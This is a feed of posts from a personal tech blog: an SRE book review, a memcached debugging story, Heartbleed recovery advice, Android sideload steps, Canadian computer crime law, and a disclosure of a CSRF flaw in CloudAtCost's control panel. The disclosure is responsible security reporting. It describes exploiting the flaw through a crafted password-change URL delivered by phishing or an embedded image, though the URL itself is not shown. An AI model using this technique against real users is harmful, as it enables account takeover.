hashbang.ca -- Mike Doherty
https://hashbang.ca

Book review: Site Reliability Engineering
https://hashbang.ca/2016/04/07/book-review-site-reliability-engineering
Thu, 07 Apr 2016 06:01:59 +0000

Google has been working for about two years on a book about Site Reliability Engineering, the discipline and organization that keeps Google's large-scale systems running smoothly. "Site Reliability Engineering" was finally published last week. It spans some 500 pages, and offers a rare inside glimpse into how Google actually works. The authors are remarkably open, naming technologies and projects, and explaining how systems work. There may not be source code, but there's lots here that can be implemented outside Google. That makes it a great read for startups expecting to scale and for small-to-medium tech companies that want to up their reliability game.

Right off the top, you should know I work as an SRE at Google, and I was involved in putting together a small part of Chapter 33, which talks about how SRE principles are found outside of tech. I had the opportunity to read that chapter prior to publication, and I thought it told a story well worth telling, so I've been excited about this book's release for a while now. The google.com/sre landing page has launched (and has lots of great resources), and the book went on sale (O'Reilly, Amazon, Google Books) on April 6 2016.

Obviously, the book isn't likely to have many earth-shattering revelations for me, coming from inside the organization that put this book together. Still, I'm interested in what we're saying to the rest of the tech community. Google has historically struggled to articulate well what SRE is. That uncertainty was something I had to wrestle with when I was first offered a job here. I'm very glad I decided to come here and be immersed in Google's SRE tech and culture. Google is remarkably good at running large systems, and SRE is the collection of practices that resulted in building the tech and culture that allow us to do that effectively.

The good news is that even though you don't have Borg or Chubby, you can still do a lot of the same things that Google SRE does. You do not have to give up and go home because you don't have the source code for Borgmon. Just use Prometheus. This book gives lots of practical advice that you can actually start using right away. It can also give you ideas of what to aim for as you start building larger and larger systems -- if you are going to write your own Borgmon, there's lots of great information on how to do it (and some on how not to -- the book is refreshingly honest about missteps).

The book (to my knowledge) doesn't talk about any technologies that weren't already public. Papers and public talks on Piper, Borg, Maglev, and more have come out in recent years, so the authors can talk about them publicly now. Specific technologies are interesting as case studies, but the principles of SRE are how Google made those investments, and the book is about SRE, not specific software projects or systems. For the most part, this book doesn't describe ready-made systems, but rather practices and principles that you can take individually as you start out, though they work best as a coherent whole. Luckily, there are tractable pieces of advice for lots of different kinds of readers. I talk more about that at the end of the review.

Overall, I'm impressed with how open the authors are. I've been surprised to see products and projects mentioned by name, so tech voyeurs may find the book interesting for that reason. There are some great "war" stories -- some I had heard, some I hadn't. The war stories are invariably instructive, and serve as a reminder that though Google may look from the outside like a duck calmly bobbing across a pond, underneath, the duck's feet are paddling like mad. SRE are the duck's feet. Our SRE teams are engineers who make it seem like Google's systems always work perfectly. They don't. There's pretty much always something failing -- but we've built systems to withstand failures of all scales, from a bad hard drive to a hurricane taking out a whole datacentre. The SRE book tries to show how you can too.

A guided tour

The book is divided into five sections: Introduction, Principles, Practices (the largest by far, ~60% of the book), Management, Conclusions. I want to talk briefly about specific chapters that I think will be especially interesting or valuable for readers. If that doesn't interest you, skip ahead to my reflections on the value of the SRE book for readers.

"Introduction" is actually important to set the stage for talking about specific practices, and I urge you not to skip it. The first chapter outlines what SRE is, and draws distinctions between SRE, system administration, and DevOps. The second chapter gives a high-level overview of Google's production environment, from Borg to storage, networking, and the development environment. As you read this, think of alternatives that are available externally: Apache Mesos and Kubernetes are mentioned specifically, but Nomad is a newcomer that also looks promising.

"Principles" expands on chapter 1, beginning with risk management.  This is key to understanding the tension inherent in SRE. If we wanted 100% stability, we'd never allow product teams to change anything. This kills the business. Instead, we want to manage the level of risk we take so we move as fast as possible without breaking things worse than our error budget allows.
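To make the error-budget idea concrete, here's a minimal sketch of the arithmetic. This is my own illustration, not code from the book; the numbers are invented. The budget is simply the unavailability the SLO allows, and risky pushes can be gated on how much of it remains.

```python
def error_budget_minutes(slo: float, window_days: int = 30) -> float:
    """Minutes of allowed unavailability implied by an availability SLO."""
    total_minutes = window_days * 24 * 60
    return total_minutes * (1 - slo)

def can_release(budget_minutes: float, downtime_minutes_so_far: float) -> bool:
    """Gate risky changes on remaining error budget."""
    return downtime_minutes_so_far < budget_minutes

# A 99.9% SLO over a 30-day window allows roughly 43.2 minutes of downtime.
budget = error_budget_minutes(0.999)
```

With 10 minutes of downtime spent, `can_release(budget, 10)` allows a push; after 50 minutes, releases pause until the window rolls over.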

Skipping ahead, chapters 6 and 10 discuss in some depth how Google monitors systems of such massive scale, and how we alert ourselves when things go wrong (it also discusses what "wrong" means, which is very important). This is perhaps as hard a problem as building the systems to be monitored in the first place, and pulling it off is a feat of software and systems engineering.
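One way to decide what "wrong" means is to page only when errors are burning the SLO's budget much faster than sustainable. This is my own illustrative sketch; the threshold and defaults are invented, not Google's.

```python
def should_page(errors: int, requests: int, slo: float = 0.999,
                burn_rate_threshold: float = 10.0) -> bool:
    """Page when the observed error ratio exceeds burn_rate_threshold times
    the error ratio the SLO allows (i.e., the budget is burning too fast)."""
    if requests == 0:
        return False
    allowed_error_ratio = 1 - slo
    return errors / requests > burn_rate_threshold * allowed_error_ratio
```

At a 99.9% SLO, 200 errors in 10,000 requests (2%) pages; 5 errors in 10,000 (0.05%) does not, even though it technically exceeds the budget rate.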

Chapter 7 talks about SRE's dedication to automation. Automation is incredibly valuable at our scale, but as Google's scale increases, we aspire to build systems that go beyond automation: systems that are autonomous. This is the only way we can ever hope to operate our largest systems, and the systems of the future.

One of the most important things about SRE is the culture. This is discussed in pockets throughout the book, but a key element is "postmortem culture". Chapter 15 explains what this means, and in particular why postmortems must be blameless.

Blameless postmortems are a tenet of SRE culture... You can't "fix" people, but you can fix systems and processes to better support people making the right choices when designing and maintaining complex systems.

This is really key. It is critical that postmortems be blameless so we can understand honestly and fully what happened, why the people involved did what they did, and how to make the system more reliable, even though it has unreliable components (power supply, humans, etc).

Another purpose of postmortems that isn't discussed until chapter 28 is that some postmortems are "teachable" -- they can give really great insight into how systems (don't) work, how incidents are handled, and also serve as proof that your postmortem culture takes the "blameless" part seriously.

Google's founders Larry Page and Sergey Brin host TGIF, a weekly all-hands held live at our headquarters in Mountain View, California, and broadcast to Google offices around the world. A 2014 TGIF focused on "The Art of the Postmortem," which featured SRE discussion of high-impact incidents. One SRE discussed a release he had recently pushed; despite thorough testing, an unexpected interaction inadvertently took down a critical service for four minutes. The incident only lasted four minutes because the SRE had the presence of mind to roll back the change immediately, averting a much longer and larger-scale outage. Not only did this engineer receive two peer bonuses immediately afterward in recognition of his quick and level-headed handling of the incident, but he also received a huge round of applause from the TGIF audience.

When we say "blameless" postmortems, we mean it, and you should too. Displaying that for new team members is an important part of the acculturation process. Teachable postmortems also let new team members understand the systems and how they interact. When I was preparing to interview with Google, I found this a really useful exercise: reading postmortems from companies that are more public with postmortems than is typical helped me think about larger-scale systems than I'd encountered previously. When I arrived at Google, I found that my team had a great collection of postmortems that I read throughout the onboarding process. That helped me get better at systems thinking in general, and learn about our systems specifically.

Chapter 17 discusses testing for reliability. This is one of the few chapters I felt was a let-down. It touches on critical strategies like load testing and canarying, but doesn't discuss them in much detail. It's possible the authors didn't want to say more publicly, or the material was cut for length (if so, I would have cut elsewhere), but I was disappointed nonetheless. I'm not sure there's enough meat here for folks who don't already know these practices to get a good grip on how they should incorporate them into their existing environment.

There's also a section that talks about the "order" of a software fault. I don't use those concepts in my work, and I don't know anyone who does either. Perhaps we should. And perhaps I should take a more positive view on this -- Google's SRE teams are not all the same, and we continually learn from one another. This may be something my team should learn and internalize. I'll be coming back to chapter 17 in the coming weeks.

A series of four chapters details how Google does load balancing at various levels (chapters 19 & 20), and how Google handles overload and avoids cascading failure (chapters 21 & 22). These are interrelated topics, and deserve their collective 60 pages. We have standard server- and client-side implementations for applying and respecting backpressure, weighted round robin load balancing, backend subsetting, request priority/criticality and load shedding, query cost, and more. These are all important to get right in order to avoid overload and cascading failure, so letting everyone learn from their mistakes individually is a bad plan.

We learned this lesson the hard way: modeling capacity as "queries per second" or using static features of the requests that are believed to be a proxy for the resources they consume (e.g., "how many keys are the requests reading") often makes for a poor metric... A moving target makes a poor metric for designing and implementing load balancing... We often speak about the cost of a request to refer to a normalized measure of how much CPU time it has consumed.
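As a rough illustration of criticality-based load shedding: the four criticality levels are the ones the overload chapter describes, but the utilization thresholds and function names here are invented for the sketch.

```python
from enum import IntEnum

class Criticality(IntEnum):
    # The four request criticality levels, least critical first.
    SHEDDABLE = 0
    SHEDDABLE_PLUS = 1
    CRITICAL = 2
    CRITICAL_PLUS = 3

# Invented thresholds: shed the least-critical traffic first as load rises.
ADMIT_BELOW = {
    Criticality.SHEDDABLE: 0.70,
    Criticality.SHEDDABLE_PLUS: 0.80,
    Criticality.CRITICAL: 0.90,
    Criticality.CRITICAL_PLUS: 0.97,
}

def admit(criticality: Criticality, cpu_utilization: float) -> bool:
    """Accept a request only while utilization is below its criticality's cutoff."""
    return cpu_utilization < ADMIT_BELOW[criticality]
```

At 75% utilization, sheddable traffic is already being dropped while critical-plus requests still get through, which is exactly the graceful-degradation behaviour you want ahead of a cascading failure.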

The next pair of chapters, 23 and 24, cover distributed consensus systems and Borgcron, Google's distributed cron service, which uses distributed consensus. Distributed cron is harder than you might think, and the exercise of walking through the design in layers, building from single-machine cron up to Borgcron is instructive.
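To hint at why distributed cron is hard: a failed-over scheduler must be able to tell whether a scheduled run already launched. A toy sketch of that core idea follows; the dict stands in for a Paxos/Raft-backed store, and all names are illustrative, not Google's.

```python
class CronState:
    """Records launch intent in what would be a consensus-backed store."""

    def __init__(self):
        self._store = {}  # stand-in for a replicated, consensus-backed store

    def try_claim(self, job: str, scheduled_time: int) -> bool:
        """Atomically claim a (job, time) slot; False if already claimed."""
        key = (job, scheduled_time)
        if key in self._store:
            return False
        self._store[key] = "launch-intent-recorded"
        return True

def maybe_launch(state: CronState, job: str, scheduled_time: int,
                 am_leader: bool) -> bool:
    # Followers do nothing; even a freshly elected leader launches only
    # if no previous leader already recorded intent for this slot.
    return am_leader and state.try_claim(job, scheduled_time)
```

Recording intent *before* launching is what prevents a new leader from double-running (or silently skipping) a job after a failover.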

Part 4 concerns management of SRE teams. Since this is less interesting (to me) than the technical parts of the book, I want to skip ahead. I will point out that my team's work gets a mention at the end of chapter 32, in the section "Evolving Services Development: Frameworks and SRE Platform" (p. 451). We believe this sort of platform standardization effort is key for scaling Google SRE, and therefore for scaling Google systems.

Part 5 leads off with some stories about how other industries achieve high reliability. I'm quoted a few times, and this is the chapter I was asked to review pre-publication. I'm not sure how much value it adds to the book, but it is satisfying to see commonalities between other industries that require high levels of reliability, suggesting that Google SRE isn't totally on the wrong track.

Some reflections

With that whirlwind tour of some of the most notable parts of the book completed, I want to discuss the value this book can have. Is this just Google showing off, or is there value for the reader as well? Are the practices described in the book really practicable for smaller companies? I think so. There's lots of tractable advice in here for open-source projects, smaller companies, and even for large tech companies that don't have a mature SRE organization like Google's.

For open-source projects, many of the software development and testing practices described can be easily implemented. You should be designing with backpressure and graceful degradation in mind; with white-box monitoring in mind; with extensive testing that goes beyond unit tests; and so on.

For small companies, perhaps with a handful of engineers doing operations in a traditional sysadmin way, how can this book help you? First, it can show you a different path. But implementing all of this can seem overwhelming, and in fact, I don't think that's the right approach. Instead, you should start with the principles of SRE. You should alter your training and hiring so that your sysadmin team gets the software development chops it may be missing. You should make sure you're doing blameless postmortems, and fixing all the action items when outages happen. You should have SLOs, and slow down release cadence when you exhaust your error budgets. In particular, look at chapter 30, "Embedding an SRE to Recover from Operational Overload" -- all you'll be missing is the SRE who embeds with the team having challenges. It'll be up to you to hire that person, and then make sure they're set up for success as they try to steer your ship. See chapters 1 and 28 as well.

For larger companies with lots of engineering talent, but without a mature SRE organization, the likely paths are more numerous, and depend on what you think you're not getting out of your engineering organization. If you still have a pure operations department, or if you do DevOps, but without a dedicated SRE team to build a platform for your DevOps folks, it may be time to change how your engineering organization is structured. Larger companies are also in the best position to look at the specific technological choices Google has made. For example, if you don't have standards for avoiding overload and cascading failure, invest the software engineering cycles into building that infrastructure. If you're having problems with load balancing, take cues from how Google is doing it.

Last, I want to say that the book was actually really enjoyable to read.

I strongly recommend that folks interested in DevOps, operations, reliability, and software engineering for scale read the book. It's a valuable glimpse into Google's inner workings, and it offers tractable advice, even if you don't have access to Google engineers and source code. You absolutely can find implementable ideas in here.

If you're interested in talking about SRE or the SRE book, a bunch of us hang out on Slack.

Diagnosing performance degradation under adverse circumstances
https://hashbang.ca/2015/06/03/diagnosing-performance-degradation-under-adverse-circumstances
Thu, 04 Jun 2015 00:31:39 +0000

[This post is a few years old and was never published. Recently, I was reminded about memcached slab imbalance, which in turn reminded me of this post.]

At work, we encountered a sudden and precipitous performance regression on one particular page of a legacy application. It's a Perl web application, running under mod_perl, using ModPerl::RegistryLoader to compile scripts at server startup, and Apache::DBI to provide persistent database connections.

Our users suddenly began complaining about one particular page being "three times slower than normal." Later examination of the Apache logs showed a 20x(!!) slowdown.

Investigating this performance problem was interesting because we didn't have good access to the required data, and our technology choices slowed us down or completely prevented us from collecting it. Although we solved the mystery, the experience taught several important lessons.

Over the course of several days, we examined a number of possibilities for the sudden performance degradation.

Initially, we thought it was related to a release we did on the same day the performance issues began being reported. Nobody on the team could think of anything relevant that was changed, but I read the entire diff between the two releases to confirm it. We hadn't touched the code, so we quickly started thinking about external factors: database, caching, server health, etc.

I was unable to reproduce the performance issue in a development environment, but when I disabled memcached, I saw pathological slowdowns on all pages. This was an interesting result, because we had started caching some frequently-accessed files in memcached. That could potentially fill the cache, or cause a slab imbalance, for example. These new items being cached were part of a separate application -- perhaps we were hitting limits on the number of connections.

But, examination of memcached statistics (what statistics we had available; recent versions of memcached provide much better data) showed that it was performing normally in the production environment. The cache hadn't reached maxbytes, and the server had memory available for allocation. There were no cache evictions, so slab imbalance wasn't to blame. The number of connections was nowhere near the limit.

So, we have two interesting data points now:

  1. With memcached, the application performs normally in a development environment.
  2. Without memcached, everything is slow in the development environment -- just like the performance issues in production, except that in production the slowdown was isolated to one particular page.

So, we needed to get some data from production to see what was really happening there, instead of extrapolating from a development environment. We obtained a clone of the server, hooked it up to the production database, and used SSH port forwarding to connect to the production server's memcached. This should be just like the live system, except with only one user accessing the application.

Lo and behold, I saw performance degradation for just the one page, just like on the live system. That's great -- now we need tracing or profiling data so we can see what's going on beneath the surface.

Well, the combination of technologies we chose makes getting DBI_PROFILE enabled surprisingly difficult. After wasting more hours than I care to admit, I gave up and reached for Devel::NYTProf instead. It turns out that this was probably a more useful tool in the end.

This application uses an in-house legacy ORM-like tool for a lot of database access. When I had disabled memcached entirely, I saw that all the object constructors were very slow -- this "ORM" relies very heavily on caching for performance. I had been pointing to the "ORM" as the culprit -- it was clearly performing poorly without a cache -- but it did have a cache in production. This difference was the last piece of the puzzle.

With the new profiling data from the production system, I could see that the ORM's object constructors were only performing poorly for a single type, rather than all of them. And we use that particular type's constructor on the affected page. It turns out it loads an entire database table, and attempts to store it as a single key in memcached. BINGO!

Memcached has a 1MB per-item limit by default, and upon checking the size of the table, it had just reached 1.1MB. We have a winner! (Or is that a loser?)

We don't need the whole table, because some of those records are inactive. Actually, we don't even need all the active records, because only some (usually zero!) are relevant for the current request. And really, we don't need the whole row, just one column. And we certainly don't need to store all this data as a single item in memcached. This is a whole huge bag of fail.
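The shape of the fix can be sketched as a cache-aside lookup: cache one small value per record instead of the whole table under a single key, fetch only the column you need, and check whether the set actually succeeded. The key scheme, client interface, and names here are invented for illustration, not our actual code.

```python
def lookup_value(cache, db, record_id):
    """Cache-aside lookup: one small cached value per record."""
    key = f"mytable:{record_id}:value"  # per-record key, not one key for the table
    value = cache.get(key)
    if value is None:
        value = db.fetch_one_column(record_id)  # fetch only the column we need
        if not cache.set(key, value):
            # set() can fail (e.g. value too large); don't assume it worked
            pass
    return value
```

Each cached item stays tiny and well under memcached's per-item limit, and a cache miss on one record no longer forces loading (or re-serializing) the entire table.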

The easiest short-term fix is to upgrade memcached and set a per-item limit higher than 1MB. Recent versions of memcached allow setting the slab page size, which increases the per-item size limit. Instead of fixing the legacy code, this gives us a great reason for porting it to Catalyst.

Lessons learned

Tracking down this problem was extraordinarily frustrating because of the difficulties in getting valid data. We tried to extrapolate from a development environment for too long before trying to get data from a production-like environment. If we had been able to do that from the beginning, we would have solved the problem in a day instead of a week.

Another massive frustration was trying to get DBI_PROFILE to work with our choice of technologies. mod_perl alone isn't so bad, but ModPerl::RegistryLoader and Apache::DBI are complications that just make life difficult.

Finally, we didn't have good metrics on performance in the live environment. We didn't think anything was wrong until people complained, and we couldn't confirm something was wrong until we pulled the Apache logs and did ad-hoc analysis on the response times. We need real-time performance monitoring.

Old versions of memcached can be recompiled to increase the slab page size, but recent versions have a -I flag to control this at server startup. Likewise, recent versions of memcached provide statistics necessary to diagnose slab imbalance and other critical health indicators. For our case, you can monitor cmd_set - total_items -- anything other than zero is a problem. Also, make sure you check if the memcached set worked -- programmer "optimism" is really just programmer error. Finally, stability is not always worth flying blind -- consider upgrading.
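The cmd_set - total_items check can be automated against the dict a memcached client returns for the stats command. The stats field names below are memcached's own; the health rule follows this post, and the function names are mine.

```python
def failed_sets(stats: dict) -> int:
    """cmd_set - total_items: anything other than zero is a problem."""
    return int(stats["cmd_set"]) - int(stats["total_items"])

def looks_unhealthy(stats: dict) -> bool:
    # Nonzero failed sets, or any evictions, suggests slab imbalance
    # or items bouncing off size limits.
    return failed_sets(stats) != 0 or int(stats.get("evictions", 0)) > 0
```

Wire this into whatever monitoring you have so a silently failing set shows up as an alert instead of a mystery slowdown weeks later.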


  1. Be sure there is a problem before trying to solve it. If you can't tell this from your normal monitoring, enhance your monitoring.
  2. Be able to collect tracing/profiling data from your real production system if possible, or a production-like system otherwise. Know how to do this ahead of time, and have the process documented. You don't want to waste time figuring this out when you need data.
  3. Loading way more data than you need is probably a very bad idea, even if you hide the problem with exorbitant amounts of caching.
  4. Understand the limits of your tools. Memcached isn't a hard-disk where you can dump as much data as you want (and even hard disks are of finite capacity). Trying to cache an entire database table as a single item is totally wrong.
  5. Technology progresses for a reason. While stability is important, it probably isn't worth flying blind or doing without important features.
  6. Consider your tradeoffs carefully when dealing with legacy code, and take advantage of convincing reasons to dump it when they come along.
CSRF vulnerability at CloudAtCost.com
https://hashbang.ca/2014/12/11/csrf-vulnerability-at-cloudatcost-com
Thu, 11 Dec 2014 05:00:57 +0000

CloudAtCost.com provides low-cost virtual machines hosted in Canada. panel.cloudatcost.com is the management interface, where customers can install OS images, access a console, etc.

[Photo: a system security breach indicator light, by Jeff Keyzer (CC-BY-SA)]

A cross-site request forgery vulnerability was discovered in this web application. If a customer could be tricked into visiting a crafted URL while logged in, an attacker could change the victim's password, gaining access to the management interface.

In turn, this grants root access on all the victim's VMs, the ability to wipe or reinstall VMs, and potentially allows the attacker to spend the victim's money on CloudAtCost products and services.

Changing the password does not end the session or email the user, so the victim will not immediately notice anything is wrong. Exploitation of CSRF is difficult to detect on the server, so CloudAtCost is unlikely to notice anything is wrong either.

There is no evidence the vulnerability is being exploited, but exploitation is trivial and the impact of exploitation is severe. Exploitation is simple: build a URL of the following form:


Any method that gets the victim to load the crafted URL in their browser while logged in will cause their password to be changed, and the attacker can simply log in. Phishing emails are a common exploitation vector. A watering hole attack could also work: create a website that CloudAtCost users would visit, or use one that already exists (such as https://forum.cloudatcost.com), and embed the crafted URL as an img resource, for example, to similar effect. Other exploitation methods are certainly available, and practicable.
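The standard defense against this class of attack is a synchronizer token: every state-changing request must carry a secret value tied to the session, which a crafted URL hosted on another site cannot know. This is a generic sketch of that defense, not CloudAtCost's code; all names are invented.

```python
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)  # kept server-side, never sent raw

def csrf_token(session_id: str) -> str:
    """Derive a per-session token an attacker can't forge."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def allow_password_change(session_id: str, submitted_token: str) -> bool:
    # Reject any state-changing request without a valid token;
    # compare_digest avoids leaking information through timing.
    return hmac.compare_digest(csrf_token(session_id), submitted_token)
```

The server embeds the token in its own forms, so a GET request arriving via a phishing link or an img tag fails the check and the password stays unchanged.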


  • September 25, 2014: vulnerability discovered, and disclosed to CloudAtCost through a customer support ticket. Feedback is passed along, and the customer support ticket is closed.
  • September 25: vulnerability report is escalated via email. No reply.
  • October 2: vulnerability report is escalated via email, and a single point of contact at CloudAtCost is provided. Details are provided to that contact directly. No reply.
  • October 9: Direct contact is made with CloudAtCost and the Canadian Cyber Incident Response Centre (CCIRC), and full details are repeated. Follow-up is promised, but doesn't happen.
  • October 14: CCIRC reports that the vulnerability has been fixed. Testing shows that this is not the case. Clarification is requested from CloudAtCost. Deployment of the patch is scheduled for Nov 1.
  • November 3: The self-imposed date for deploying the patch (November 1) passes, and the application is still vulnerable. Clarification is requested from CloudAtCost. None is provided.
  • November 7: Information on the progress of deploying the patched application is requested. None is provided.
  • November 14: I spoke with a CloudAtCost representative on the phone, who said their team was having trouble getting a release out, and needed more time.
  • November 26: Information on the progress on deploying a fixed version of the web application was requested. No reply.
  • December 10: A hard deadline for public disclosure was set, and sent to CloudAtCost. The patched web application had been deployed within the previous 3-4 days.
  • December 11: This disclosure is published.
Legal issues in computer security research
https://hashbang.ca/2014/04/19/legal-issues-in-computer-security-research
Sat, 19 Apr 2014 04:04:42 +0000

This Thursday, I gave a talk at AtlSecCon 2014. The weather threw a wrench in the organizers' plans, but they managed to pull off a solid conference. Unfortunately, the talks weren't recorded this year. The slides are posted on speakerdeck, and are embedded below the fold.

I also reprised this talk at NSLUG, and recorded audio, now posted on SoundCloud, and also embedded below the fold.

Finally: late last year, I wrote 3 posts exploring Canada's computer crime laws (1, 2, 3) which were initial versions of work that eventually became two papers I submitted this semester for a directed studies course. If you were interested in those posts, I've embedded the final PDFs below. The talk is a condensed version of that work.


Recovering from Heartbleed
https://hashbang.ca/2014/04/08/recovering-from-heartbleed
Tue, 08 Apr 2014 16:03:21 +0000

Heartbleed is a critical vulnerability in OpenSSL revealed yesterday. I'm not sure it could be more serious: it allows an attacker to connect to your server and use the TLS heartbeat extension to obtain 64k of server memory (and do it again to get another 64k, and again, and...) -- while leaving no traces in logs. That server memory might include primary key material (private keys), secondary key material (usernames and passwords), and collateral (memory addresses, canaries used to detect overflow, etc.).

The researchers who discovered Heartbleed did a great job of outlining the severity of the vulnerability, as well as how to recover from it. For server operators, this is actually fairly straightforward: patch the OpenSSL vulnerability, install new keys, revoke the old ones, and be sure to restart every service that uses OpenSSL (or just reboot the whole server if in doubt). Unless your server was configured to use PFS, this still leaves all past traffic vulnerable to decryption; and even with PFS, a leaked session ticket key would compromise all the sessions it signed.

While these recovery steps are straightforward, they're not easy to carry out for large organizations. I have just one server, and no overhead. I was able to recover in about an hour and a half, and most of that was waiting for the CA's verification email process.

Secondary recovery

But what about recovering from potential compromise of secondary key material, and collateral?

Collateral, such as memory addresses, might be useful to an attacker, but only for a short time. Upgrading to a patched version of OpenSSL is sufficient to make this data useless.

Secondary key material is of particular concern. Heartbleed made it possible for an attacker to obtain passwords from server memory, and/or obtain your private key, which they could then use to decrypt any traffic you thought was secure by virtue of using TLS. That includes, for example, passwords on the wire. So, as a website operator, you might want to assume that passwords have been compromised. Hopefully you have a way to force everyone to pick new passwords that you can deploy after you've completed your recovery procedures.

But as a user, how can you handle this proactively? Paranoid users might want to change all their passwords; less paranoid users might want to change a handful of high-value passwords. Regardless, how do you decide when to do that? There are probably many services that won't be asking you to change your password -- maybe because they didn't think of it, or maybe because they decided on your behalf that that's not needed. If you want to do it anyways, how do you know when to change your password? You want to make sure it is after they've completed their upgrades, but as soon as possible.

Do you change passwords now, which is as soon as possible, but might be while the server is still vulnerable? In this case, your password might be compromised either now or later by exploitation of heartbleed.

Or do you wait, and do it later? I think this makes more sense. This risks leaving a compromised password in place, but gives the server operator a chance to patch their systems so that when you finally do change the password, it won't be compromised (by heartbleed, at least). This isn't a trivial matter: major websites like Yahoo! were vulnerable, and recovering from heartbleed on such large sites will be very complex, and thus time-consuming. You absolutely do not want to assume that big web companies are fully recovered yet -- check out these scan results from a research team at the University of Michigan.

Detecting patched servers

So, how do you know when they're done patching? Ideally, they'll let you know. If you're curious now, you can test their services yourself. I've seen several tools making the rounds:

[Update: Predictably, there are bugs in the heartbleed detection scripts. I've updated the provided list accordingly.]

Please consider carefully whether you should be using these tools. Cybercrime legislation in both the US and Canada is pretty bad. You could land yourself in trouble by using these tools. Understanding your risk is the first step in determining if the risk is acceptable.

If you do use one, keep in mind that this only tells you whether the site in question has upgraded OpenSSL -- not whether they have replaced private keys, which is a critical step in recovery.

You can check the "valid from" date on the certificate, which might indicate they've done something, but it is possible to get a new certificate without changing the private key, so even this isn't sufficient. You'll really just have to wait for the website to let you know when they've replaced private keys, and then take their word for it.
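If you want to inspect that date from a shell, openssl can print a certificate's validity window directly. A sketch (the self-signed certificate generated here is just a stand-in so the commands are runnable; for a real site you'd fetch its certificate with openssl s_client first):

```shell
# Stand-in certificate so the commands below have something to inspect;
# for a real site, fetch the cert instead (see the commented command).
openssl req -x509 -newkey rsa:2048 -nodes -keyout /tmp/hb-key.pem \
    -out /tmp/hb-cert.pem -days 1 -subj "/CN=example.test" 2>/dev/null

# For a live site:
#   openssl s_client -connect example.com:443 </dev/null 2>/dev/null \
#     | openssl x509 > /tmp/hb-cert.pem

# Print the validity window; "notBefore" is the "valid from" date
openssl x509 -in /tmp/hb-cert.pem -noout -startdate -enddate
```

Remember that a recent notBefore date only shows the certificate was reissued, not that the underlying private key was replaced.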

Remember: you should not change your passwords until the website has completed their recovery. Ideally, they will let you know when that happens.

Mike will be a Googler https://hashbang.ca/2014/02/15/mike-will-be-a-googler https://hashbang.ca/2014/02/15/mike-will-be-a-googler#comments Sat, 15 Feb 2014 23:57:04 +0000 https://hashbang.ca/?p=1948 I spent about 3 months interviewing with a number of companies in Canada and the US, and I was lucky enough that the list included an interview with Google's Site Reliability Engineering team. I went down to the Mountain View campus again in December for an on-site interview. Although the process was daunting, I made a good enough impression that they've invited me to join the SRE team in Mountain View as a Systems Engineer when I graduate this May.

I'll be relocating in June, and beginning work in July. If you're looking for a shared apartment in San Francisco starting in July, let's talk. I'd like to avoid sharing with someone I don't know, so if we talk now, I'll know you by then.

Upgrading encrypted Android devices https://hashbang.ca/2014/02/15/upgrading-encrypted-android-devices https://hashbang.ca/2014/02/15/upgrading-encrypted-android-devices#comments Sat, 15 Feb 2014 23:55:15 +0000 https://hashbang.ca/?p=1952 If you encrypt your Android device, the standard over-the-air (OTA) upgrades don't work, because /sdcard can't be mounted in recovery. Instead, Elad Alfassa suggests booting into recovery, creating a tmpfs on /sdcard, and putting the new ROM in there before flashing it. On my device, running ClockworkMod, that doesn't work, because it still tries and fails to mount /sdcard. It turns out that /sdcard is a symlink to /data/media, but even eliminating that doesn't help; ClockworkMod still tries to mount the partition.

Instead, I used the new sideload facility, which lets you flash files sent from adb on your computer, instead of from the phone's internal storage. This effectively gets around the problem of /sdcard being unmountable, and is pretty easy.

First, boot into recovery, and select "install zip", then "install zip from sideload". You're given instructions to send the file with adb sideload update.zip on your computer. This requires android-tools to be installed and configured. You'll get a progress indication as the file is uploaded to the phone. Once complete, the phone will automatically begin installing it. Simply wait for the installation to finish, and reboot the phone. Enjoy the updated ROM!
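From the computer's side, the whole procedure looks roughly like this (a sketch, assuming android-tools is installed, the device is already in recovery with sideload selected, and update.zip is whatever ROM file you're flashing):

```shell
# Confirm the device is visible in sideload mode
adb devices

# Push and flash the ROM; adb shows upload progress,
# then the phone installs it automatically
adb sideload update.zip

# When installation finishes, reboot from the recovery menu
```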

Exploring Canada's computer crime laws: Part 3 https://hashbang.ca/2013/11/06/exploring-canadas-computer-crime-laws-part-3 Wed, 06 Nov 2013 19:10:52 +0000 http://hashbang.ca/?p=1775 Since the exceptions in copyright law for encryption and security research don't apply if you're doing anything criminal, I next looked at the Criminal Code [PDF].

Unauthorized use of a computer

s 342.1 more closely resembles the CFAA, in that it seems to draw an analogy with trespass.

Unauthorized use of computer

342.1 (1) Every one who, fraudulently and without colour of right,

(a) obtains, directly or indirectly, any computer service,

(b) by means of an electro-magnetic, acoustic, mechanical or other device, intercepts or causes to be intercepted, directly or indirectly, any function of a computer system,

(c) uses or causes to be used, directly or indirectly, a computer system with intent to commit an offence under paragraph (a) or (b) or an offence under section 430 in relation to data or a computer system, or

(d) uses, possesses, traffics in or permits another person to have access to a computer password that would enable a person to commit an offence under paragraph (a), (b) or (c)

is guilty of an indictable offence and liable to imprisonment for a term not exceeding ten years, or is guilty of an offence punishable on summary conviction.

The "fraudulently and without colour of right" language immediately makes me think of the vagueness of "unauthorized" and "exceeding authorization" in the CFAA -- language which is widely regarded as problematic. Immediately following the quoted text, the Criminal Code lists several definitions. I omitted them for brevity, and because they didn't seem problematic to me. The terms "fraudulently" and "without colour of right" are not defined there, but they are explored in case law. "Essentials of Canadian Law: Computer Law" (2nd ed., by George S. Takach, 2003 [yes, seriously, 2003]) explains:

"Fraudulently" means dishonestly and unscrupulously, and with the intent to cause deprivation to another person.

The intent requirement here might be a useful get-out-of-jail card for security researchers who did not intend to deprive any other person. For example, I have a hard time imagining that prosecutors could successfully argue that weev intended to deprive others of... their blissful ignorance?

"Without colour of right" means without an honest belief that one had the right to carry out the particular action. To establish "colour of right," one would need to have an honest belief in a state of facts that, if they existed, would be a legal justification or excuse.

This escape clause might apply, for example, if someone sat down at a computer in the library thinking it was open for anyone to use, but it was really unlocked by someone who had stepped away. (Fun fact: I once nearly did this with a classified computer system, but was caught before doing more than jiggling the mouse. Oops! I honestly thought I was allowed to access that computer. If that had actually been true, then that would have been a legal excuse. That gives a colour of right, which would get me out of a charge under s 342.1.)

However, "without colour of right" seems simply to postpone the difficult question of what use of a computer is "unauthorized." The answer might differ depending on whether you ask a computer expert or a layperson. Making "unauthorized" objective rather than leaving it in the eye of the beholder avoids that problem, but only by replacing it with a definition the statute doesn't actually provide. The answer will presumably come from case law, but that doesn't help the people who shape the law by putting their liberty (and money -- making good legal precedent is expensive!) on the line.

